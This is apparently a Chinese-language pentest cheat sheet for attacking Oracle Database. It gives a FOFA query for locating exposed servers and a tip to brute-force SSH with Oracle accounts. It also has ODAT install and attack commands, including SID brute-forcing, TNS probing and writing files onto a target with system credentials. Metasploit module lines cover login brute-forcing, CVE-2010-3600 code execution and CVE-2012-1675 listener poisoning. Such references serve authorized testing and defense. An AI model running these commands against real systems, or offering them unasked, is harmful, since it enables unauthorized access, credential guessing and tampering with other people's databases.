Oracle
Oracle Database Server 是美国甲骨文(Oracle)公司的一套关系数据库管理系统。该数据库管理系统提供数据管理、分布式处理等功能。
fofa : app="Oracle-数据库"
版本号
- oracle 版本号是真的乱,Oracle 数据库版本号请看维基百科 Oracle Database 
注入
- Oracle数据库注入笔记 
Tips
- scott 用户默认没有启用 
- 可以用 oracle 的账号试试 ssh 的爆破 
相关文章
相关渗透工具
- jas502n/oracleShell - oracle 数据库命令执行工具,支持连接的 Oracle 版本较低 
- quentinhardy/odat - Oracle 数据库攻击工具,支持功能包括爆破 SID,提权,命令执行 - # 安装 apt install -y libaio1 alien apt install -y python3-scapy pip3 install colorlog termcolor pycrypto passlib cx_Oracle pyinstaller pip3 install argcomplete && activate-global-python-argcomplete git clone https://github.com/quentinhardy/odat.git # 访问 https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html 下载 rpm 包 alien --to-deb oracle-instantclient19.6-basic-19.6.0.0.0-1.x86_64.rpm dpkg -i oracle-instantclient19.6-basic_19.6.0.0.0-2_amd64.deb export ORACLE_HOME=/usr/lib/oracle/19.6/client64/ export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib export PATH=${ORACLE_HOME}bin:$PATH sudo -s sources /etc/profile python3 -c 'import cx_Oracle' python3 odat.py -h- python3 odat.py all -s 192.168.1.254 -p 1521 python3 odat.py all -s 192.168.1.254 -p 1521 -d ORA19C -U system -P Test1234 # 信息收集 python3 odat.py tnscmd -s 192.168.1.254 -p 1521 --ping python3 odat.py tnscmd -s 192.168.1.254 -p 1521 --version python3 odat.py tnscmd -s 192.168.1.254 -p 1521 --status # 写文件 echo "Hacked By Gerh" > /tmp/File-Test.txt python3 odat.py dbmsxslprocessor -s 192.168.1.254 -p 1521 -d ORA19C -U system -P Test1234 --putFile "/tmp" "File-Test.txt" "/tmp/File-Test.txt"
MSF 爆破
use admin/oracle/oracle_login
set RHOSTS [IP]
set SID [SID]
runCVE-2010-3600 Oracle Enterprise Manager Grid Control JSP 代码执行漏洞
- 漏洞描述 - Oracle Database Server 11.1.0.7 和 11.2.0.1 版本,以及 Enterprise Manager Grid Control 10.2.0.5 版本的 Client System Analyzer 组件中存在未明漏洞。远程攻击者可借助未知向量影响机密性、完整性和可用性。 
- 影响版本 - Oracle:Enterprise_manager_grid_control:10.2.0.5::: 
- Oracle:Database_server:11.1.0.7::: 
- Oracle:Database_server:11.2.0.1::: 
 
- MSF 模块 - use exploit/windows/oracle/client_system_analyzer_upload
CVE-2012-1675 Oracle TNS Listener Remote Poisoning
- 漏洞描述 - Oracle Database Server 在实现上存在可允许攻击者向远程“TNS Listener”组件处理的数据投毒的漏洞。攻击者可利用此漏洞将数据库服务器的合法“TNS Listener”组件中的数据转向到攻击者控制的系统,导致控制远程组件的数据库实例,造成组件和合法数据库之间的攻击者攻击、会话劫持或拒绝服务攻击。 
- 影响版本 - Oracle:Database_server:11.2.0.4::: 
- Oracle:Database_server:11.2.0.3::: 
- Oracle:Database_server:11.2.0.2::: 
- Oracle:Database_server:11.1.0.7::: 
- Oracle:Database_server:10.2.0.5::: 
 
- MSF 模块 - use auxiliary/admin/oracle/tnscmd # 该漏洞可以远程获取到 oracle 的内存信息,若是能获取到内存中的数据即为存在漏洞. set rhosts [ip] run use auxiliary/admin/oracle/sid_brute # 爆破 oracle 的 SID set rhosts [ip] run